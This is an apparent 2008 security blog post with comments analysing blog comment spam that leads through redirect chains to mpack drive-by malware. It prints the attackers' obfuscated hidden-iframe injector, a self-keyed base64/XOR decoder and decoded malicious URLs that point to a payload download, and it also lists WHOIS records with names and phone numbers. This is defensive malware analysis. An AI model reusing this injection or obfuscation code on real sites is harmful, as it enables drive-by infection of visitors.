Skip navigation.
Home

More Blog Spam / updateonline.cc

UPDATE: Starting to tear apart the updateonline.cc guys. Found several interesting urls

http://updateonline.cc/winupdate/ice/exe.php has an exe, will analyze soon.
http://updateonline.cc/winupdate/stats/
http://updateonline.cc/winupdate/ice/index.php
http://updateonline.cc/winupdate/mpack9/index.php

So assorted badness, mpack, redirects, iframes, etc.

So we suffered some more blog comment spam on Offensive Computing in the last couple of days. This is basically the same stuff that we’ve seen over and over. So far I haven’t been able to find an EXE coming from this stuff but that doesn’t mean its not there.

I started off by looking at the e-mail address the spammer subscribed from and then looking up all IP’s and domains involved. I then analyzed some of the source code on one of the pages and looked at packet captures and did some HTTP tampering.

I’m finding myself wondering why they persist in doing this. Is this simply a vehicle for malware spreading? Do they get money somehow for getting people to hit the various websites? Are they increasing their google rankings by having lots of blogs link to them?

The Email address used to post from:

drff09296@averfame.org (the previous “attack” came from qff09296@averfame.org)

Registrant Name:Harold Lani
Registrant Organization:China Construction Bank
Registrant Street1:Mansion, No.31 Guangji Street
Registrant City:Ningbo
Registrant State/Province:
Registrant Postal Code:315000
Registrant Country:CN
Registrant Phone:+86.5747300939
Registrant Email:harold@avereanoia.org

IP address of email domain

78.108.181.22

person: Serge Matveev
address: UPL TELECOM s.r.o
address: Vinohradska 184/2396
address: Prague 3,130 52
address: Czech Republic
phone: +426 267 132 361
phone: +420 267 132 102
nic-hdl: SM9797-RIPE
changed: serge@upl.cz 20080215

IP address they hit the web server from (the previous “attack” was 212.227.118.40 as well)

212.227.118.40

Name: Achim Weiss
Address: Erbprinzenstr. 4 - 12
Pcode: 76133
City: Karlsruhe
Country: DE
Name: Eric Schaetzlein
Address: Schlund+Partner AG
Address: Brauerstr. 48
Pcode: 76135
City: Karlsruhe
Country: DE
Phone: +49 721 91374 0
Fax: +49 721 91374 215
Email: hostmaster@schlund.de

A bunch of URL's are posted in the spam blog comments but really only two domains. I've posted the domain info after the first two.

http://www.daolao.ru/Confucius/Pound/it/world/negozi_abbigliamento_ravenna/negozi_abbigliamento_ravenna.htm
domain: DAOLAO.RU
type: CORPORATE
nserver: ns.masterhost.ru.
nserver: ns1.masterhost.ru.
nserver: ns2.masterhost.ru.
phone: +7 095 0000000
e-mail: yukan@tsinet.ru

netname: MASTERHOST
descr: Masterhost.ru is a hosting and technical support organization.
country: RU
notify: noc@masterhost.ru
changed: caspy@masterhost.ru 20030507
address: Lyalin lane 3, bld 3
address: 105062 Moscow
address: Russia
phone: +7 495 7729720
fax-no: +7 495 7729723

http://www.economy-pmr.org/giic/video_lesbica_asiatica_gratis/world/video_lesbica_asiatica_gratis.htm

91.196.0.85
Registrant Name:Makruha Igor N.
Registrant Organization:Economy
Registrant Street1:Tiraspol, Sverdlova
Registrant City:Tiraspol
Registrant State/Province:Tiraspol
Registrant Postal Code:mdx005
Registrant Country:MD
Registrant Phone:+373.93224
Registrant Email:pom@economy.idknet.com

org-name: HostBizUa Data Center
address: Polarna st.15 , 3 fw.
address: Ukraine, 04201 Kyiv
phone: +380(44) 5017659
fax-no: +380(44) 5017659
e-mail: support@hostbizua.com
abuse-mailbox: abuse@hostbizua.com

These are the rest of the URLS:
http://www.economy-pmr.org/giic/assicurazione_su_imbarcazioni/to/assicurazione_su_imbarcazioni.html
http://www.daolao.ru/Confucius/Pound/it/hotel_provincia_di_rovigo/verso/page_hotel_provincia_di_rovigo.html
http://www.economy-pmr.org/giic/antivirus_scansione_online.html
http://www.daolao.ru/Confucius/Pound/it/montaggio_gru_edilizia.htm
http://www.economy-pmr.org/giic/world/magnolia_negrita/index_magnolia_negrita.html
http://www.daolao.ru/Confucius/Pound/it/edilizia_pubblica/index_edilizia_pubblica.html
http://www.economy-pmr.org/giic/antivirus_scansione_online.html
http://www.daolao.ru/Confucius/Pound/it/ater_provincia_roma/page_ater_provincia_roma.html
http://www.economy-pmr.org/giic/incontro_privati_annuncio_personali/top/incontro_privati_annuncio_personali.htm
http://www.daolao.ru/Confucius/Pound/it/albergo_hotel_avellino/albergo_hotel_avellino.htm
http://www.economy-pmr.org/giic/city/cucina_cinese_ricetta/index_cucina_cinese_ricetta.html
http://www.daolao.ru/Confucius/Pound/it/test_colesterolo.html
http://www.economy-pmr.org/giic/news/annuncio_hard_sicilia/annuncio_hard_sicilia.htm
http://www.daolao.ru/Confucius/Pound/it/istruzioni_ricarica_cartuccia_epson/nix/page_istruzioni_ricarica_cartuccia_epson.html
http://www.economy-pmr.org/giic/agriturismo_guidonia/italia/agriturismo_guidonia.html
http://www.daolao.ru/Confucius/Pound/it/lol/video_sesso_scaricare_gratis/index_video_sesso_scaricare_gratis.htm
http://www.economy-pmr.org/giic/agriturismo_guidonia/italia/agriturismo_guidonia.html

So we dissected the source of the first page and found several points of interest:

Some google ad action?

 ! - - google_ad_section_start - ->
div class='post hentry'>
 a name ='6489624055325086262'>

Can tell if we are using wget / links

!-- skip links for text browsers -->
span id='skiplinks' style='display:none;'>

And again with the iframe stuff broken up to make it harder to find:


 var x = "rame";
	    var y = "i" + "f";
	    var el = document.createElement(y + x);
	    el.setAttribute("width", 1);
	    el.setAttribute("height", 1);
	    el.setAttribute("s" + "rc", p);
	    el.setAttribute("marg" + "inwidth", 0);
	    el.setAttribute("marg" + "inheight", 0);
	    el.setAttribute("scr" + "olling", "no");
	    el.setAttribute("f" + "rameborder", "0");

Now comes the really nasty part. This is the content that goes into the iframe. The first section here is a decoder which generates the url out of the char encoded numbers. Then come the char encoded characters which make up the true URL:

v var Counter = (function(name)
	        {
	            var cooks = document.cookie.split(";");
	            for (var i = 0; i 

Delchi and famousjs did a quick decode of the numbers and came up wit hthe following:


104, 116, 116, 112, 58, 47, 47, 109, 121, 98, 101, 115, 116, 99, 111, 117, 110, 116, 101, 114, 46, 110, 101, 116, 47, 112, 114, 111, 103, 115, 116, 97, 116, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 63, 85, 110, 105, 113, 67, 111, 111, 107, 61  == http://mybestcounter.net/progstats/index.php?UniqCook=

38, 100, 114, 119, 61, 104, 116, 116, 112, 37, 51, 65, 37, 50, 70, 37, 50, 70, 119, 119, 119, 46, 100, 97, 111, 108, 97, 111, 46, 114, 117, 37, 50, 70, 67, 111, 110, 102, 117, 99, 105, 117, 115, 37, 50, 70, 80, 111, 117, 110, 100, 37, 50, 70, 105, 116  == 
&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit
&drw=http://www.daolao.ru/Confucius/Pound/it


Then begains a bunch of redirection chaining so that you end up hitting a variety of sites:

1.) http://mybestcounter.net/progstats/index.php?UniqCook=1&referer=&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit 

2.) http://www.daolao.ru/Confucius/Pound/it/feed-ico.png 

3.) http://updateonline.cc/progframe.php?dop1=1 

4.) http://x-globstat.cc/adsview/a63?tip=user 

5.) http://bid-assist.org/inst/indedx.php?id=002 

6.) http://www.climbingthewall.info/d/wm017/counter21.php 

7.) http://prolnx.info/lc1008.html 


The mybestcounter.net page sends the browser to updateonline.cc and sets a cookie (packet capture):

GET /progstats/index.php?UniqCook=0&referer=&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit HTTP/1.1
Host: mybestcounter.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.daolao.ru/Confucius/Pound/it/albergo_hotel_avellino/albergo_hotel_avellino.htm

HTTP/1.1 302 Found
Date: Sat, 15 Mar 2008 00:29:35 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: CounterUniq=1; expires=Sun, 16-Mar-2008 00:29:35 GMT
Location: http://updateonline.cc/progframe.php?dop1=1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

0

The updateonline.cc GET has links to the next 4 pages inside of straight up iframes:

GET /progframe.php?dop1=1 HTTP/1.1
Host: updateonline.cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.daolao.ru/Confucius/Pound/it/albergo_hotel_avellino/albergo_hotel_avellino.htm

HTTP/1.1 200 OK
Date: Sat, 15 Mar 2008 00:29:36 GMT
Server: Apache/2.0.52 (CentOS)
Content-Length: 356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html






 

Domain info for each of them:

___________________________________________________________________

mybestcounter.net.
78.108.181.22

DOMAIN INFO:

Scott Dobson        (angry.scots@yahoo.com)
    Huangpu Road, 20
    Shanghai
    Shanghai,200080
    CN
    Tel. +86.2163248383
    
        ns2.fizot.com
        ns1.fizot.com

NETBLOCK INFO:

inetnum:        78.108.180.0 - 78.108.183.255
netname:        UPL-NET-CUSTOMERS
descr:          UPL Telecom
country:        CZ
changed:        serge@upl.cz 20071227
person:         Serge Matveev
address:        UPL TELECOM s.r.o
address:        Vinohradska 184/2396
address:        Prague 3,130 52
address:        Czech Republic
phone:          +426 267 132 361
phone:          +420 267 132 102

___________________________________________________________________

x-globstat.cc
124.217.230.178

DOMAIN INFO:

 PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676
    

NETBLOCK INFO:

    netname:      PIRADIUS-NET
    country:      MY
    e-mail:       abuse@piradius.net
    address:      PIRADIUS NET
    address:      14 Robinson Road #13-00
    address:      Far East Finance Building
    address:      Singapore 048545
    phone:        +603 8318 6932
    fax-no:       +603 8318 6932
    country:      SG
    changed:      admin@piradius.net 20071003

___________________________________________________________________
bid-assist.org
202.83.212.250

DOMAIN INFO:

Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:contact@privacyprotect.org


NETBLOCK INFO:

inetnum:      202.83.192.0 - 202.83.223.255
netname:      SINGTEL-HK
descr:        Singtel Hong Kong Limited
descr:        Unit 2519-2530
descr:        11 On Lai Street
descr:        Corporation Park
descr:        Shatin
country:      HK

person:       Expan Hostmaster
nic-hdl:      EH51-AP
e-mail:       expanhk@singtel.com
address:      28/F, Mega-iAdvantage Building,
address:      ChaiWan
phone:        +852-3105-1688
fax-no:       +852-3105-9888
country:      HK
changed:      mingkit@singtel.com 20030612
person:       Ghazali Maon
address:      Telepark
address:      5 Tampines Central 6
address:      #07-03
address:      Singapore 529482
country:      SG
phone:        +65-7808001
fax-no:       +65-7882931
fax-no:       +65-7883462
e-mail:       ghaz@singtel.com
changed:      ghaz@singtel.com 20010821
___________________________________________________________________

www.climbingthewall.info
85.255.113.166


DOMAIN INFO:

Domain Name:CLIMBINGTHEWALL.INFO
Registrant Name:Geo
Registrant Organization:Geo
Registrant Street1:123 Street
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:RU
Registrant Postal Code:121443
Registrant Country:RU
Registrant Phone:+7.4158875
Registrant Email:thisisgeo@yahoo.com

NETBLOCK INFO:

Netname:        UkrTeleGroup
descr:          UkrTeleGroup Ltd.
admin-c:        UA481-RIPE
tech-c:         UA481-RIPE
country:        UA
org:            ORG-UL25-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-HM-PI-MNT
mnt-lower:      RIPE-NCC-HM-PI-MNT
mnt-by:         UKRTELE-MNT
mnt-routes:     UKRTELE-MNT
mnt-domains:    UKRTELE-MNT
changed:        staff@ukrtelegroup.com.ua 20071101
changed:        hostmaster@ripe.net 20071102
source:         RIPE

organisation:   ORG-UL25-RIPE
org-name:       UkrTeleGroup Ltd.
org-type:       LIR
address:        UkrTeleGroup Ltd.
                Mechnikova 58/5
                65029 Odessa
                Ukraine
phone:          +380487311011
fax-no:         +380487502499
e-mail:         staff@ukrtelegroup.com.ua

person:         Andrew Sotov
address:        Mechnikova 58/5 65029 Odessa
e-mail:         staff@ukrtelegroup.com.ua
abuse-mailbox:  abuse@ukrtelegroup.com.ua
phone:          +380631508855
nic-hdl:        UA481-RIPE
changed:        staff@ukrtelegroup.com.ua 20071016

files

I ran my pcap's through a tool called tcpxtract which extracts any files from pcaps. All that came out were gif's,jpgs,pngs and html files, no exe's. (I ran them all through the unix file command and verified file types).

So either this particular set isn't pushing any malware or its hidden somewhere and I didn't trigger it.

V.

Hijacked sites?

So I went ahead and wget mirrored the sites to dig through them. What it looks like to me, someone correct me if I'm wrong, is that www.economy-pmr.org is the Moldovan government's economy site and that its just been owned and is being used to propagate this stuff.

So basically anything under www.economy-pmr.org/giic is related to this spam stuff and has iframe redirects to the urls I mentioned before. (I grepped all the html pages and found the same iframe code on basically all of them).

Im starting to think the daolao.ru site is also just some random Taoism site in Russia thats been hijacked to spread this stuff.

Everything under www.daolao.ru/Confucious/Pound/it is the exact junk with the same redirects.

definilty mpack

I downloaded a bunch of their mpack files. Also if you do a google search for the titles of these itallian word blogs that iframe redirect you, you will find hundreds of sites hosting this crap. like "video sesso scaricare gratis" for example.

V

updateonline.cc

The way they get you to go there is that do a HTTP 302 redirect from mybestcounter.net/progstats/index.php to updateonline.cc/progframe.php?dop1=1

updateonline then has a bunch of iframes that redirect you to 4 other sites.

V.

Valsmith asked me to take a

Valsmith asked me to take a look at a 404 page named lc1008.html that is associated with this.

Here's what I have :


function XKdXSY(ii){var ks="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var oo="";
var c1,c2,c3;
var e1,e2,e3,e4;
var i=0;
do{e1=ks.indexOf(ii.charAt(i++));
e2=ks.indexOf(ii.charAt(i++));
e3=ks.indexOf(ii.charAt(i++));
e4=ks.indexOf(ii.charAt(i++));
c1=(e1<<2)|(e2>>4);
c2=((e2&15)<<4)|(e3>>2);
c3=((e3&3)<<6)|e4;
oo=oo+String.fromCharCode(c1);
if(e3!=64){oo=oo+String.fromCharCode(c2);
}if(e4!=64){oo=oo+String.fromCharCode(c3);
}}while(i<ii.length);
return oo;
}
function fTomz(a1,b1){var i;
 var o="";
if (!b1) return document.write(fTomz(XKdXSY(a1),arguments.callee.toString().replace(/[^a-zA-Z0-9]/g,"")));
for (i=0;
 i<a1.length;
 i++){o+=String.fromCharCode(a1.charCodeAt(i%a1.length)^b1.charCodeAt(i%b1.length));
}return o;
}

Following this was a huge chunk of data, which we believed was base64 enceded. Doing a straight base64 decode of the data didn't reveal anything useful.
I'm not sure why, but I'm not a Javascript coder so I'm hoping that someone out here is and can break down how the data is encoded / decoded.

However, I am a sneaky bastard. I inserted a function that writes the output of the javascript to a new window.


function writeConsole(content) {
 top.consoleRef=window.open('','myconsole',
  'width=350,height=250'
   +',menubar=0'
   +',toolbar=1'
   +',status=0'
   +',scrollbars=1'
   +',resizable=1')
 top.consoleRef.document.writeln(
  '<html><head><title>Console</title></head>'
   +'<body bgcolor=white onLoad="self.focus()">'
   +content
   +'</body></html>'
 )
 top.consoleRef.document.close()
}
 

Having done that, I replaced "document.write" with " writeConsole " , and then loaded the modified html into a browser within my VM victim.

Doing a view source on the new window that popped up ....

<applet code=animan.class name= ....

... and the name was another long string of something encoded not at all in base64.

I'm chewing on that part now.

One word of warning ... although the initial code was decoded and displayed in another window, it still attempted to execute the payload.
While using this method is useful in so far as observing what is going on , do it from a VM.

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

re: Valsmith asked me to take a

Following this was a huge chunk of data, which we believed was base64 enceded. Doing a straight base64 decode of the data didn't reveal anything useful.
I'm not sure why, but I'm not a Javascript coder so I'm hoping that someone out here is and can break down how the data is encoded / decoded.

It's not strictly/only base64 encoded, but it does use the same target encoding "alphabet". Note it's not just a "huge chunk of data" but is preceded by a call to its own decoding function (BTW -- the function names are dynamically re-written with each (??) serve of the URL and potentially the encoding used could be changed server-side for each serve as well, though not apparently here).

In your sample, it will be something like "fTomz('WhQeExgMG04g[...]', null);" (the actual data may be different -- I can't be bothered bending my mind around it at the moment).

Having done that, I replaced "document.write" with " writeConsole " , and then loaded the modified html into a browser within my VM victim.

Doing a view source on the new window that popped up ....

   applet code=animan.class name= ....

... and the name was another long string of something encoded not at all in base64.

I'm chewing on that part now.

That in-script text replacement is the source of your problem -- it has "upset" the decoder, causing it to only partially correctly decode the input data. This "other long string" is, in fact, garbage from a GIGO decoding run.

Note the use of "arguments.callee.toString" and the recursive call to the "outer" decoding layer ("fTomz" in your sample) with the result of "arguments.callee.toString" on itself passed to the "inner" decoding layer ("XKdXSY") as an argument to that function call? The way the inner layer processes the function's source to produce a decoding key for the second (recursed) call to "fTomz" means that it won't (fully) decode correctly if you make any changes to the code. Correct decoding with this code depends on the decoding code being exactly as it is (well, "exactly" once passed through .replace(/[^a-zA-Z0-9]/g,"")).

To extract the decoded script from this kind of encoder/decoder you need some kind of wrapper around the script so you can extract the result of the decoding from the DOM (or its emulator) as the DOM changes, or from modified (logging) write/eval/etc functions (look at Jose Nazario's PhoneyC, the SANS patches to SpiderMonkey maybe (??), etc), or to step through the code in a JS debugger.

I don't have time to decode the next level right now, but it uses the same functions to decode various bits of itself, BUT the structure that's there looks much like one or other of the currently familiar multi-exploit scripts typically seen on these kinds of sites.

Re: Valsmith asked me to take a

Whoooops -- in my longer reply I meant to say first, it's probably a fair bet that the fancy decoding of the exploits results in attempted download and execution of http://prolnx.info/lc1008.html (--> Setup_v1008.exe), as does the (ancient!) .ANI exploit included via "anr/us1008.anr" at the to of the lc1008.html page!

If I had a penny...

For every time someone from a former soviet bloc was a pain in my ass; I would have a lot of pennies. :)

I am getting social again, Val, I hope you don't mind if I lurk around here.

-Gaussie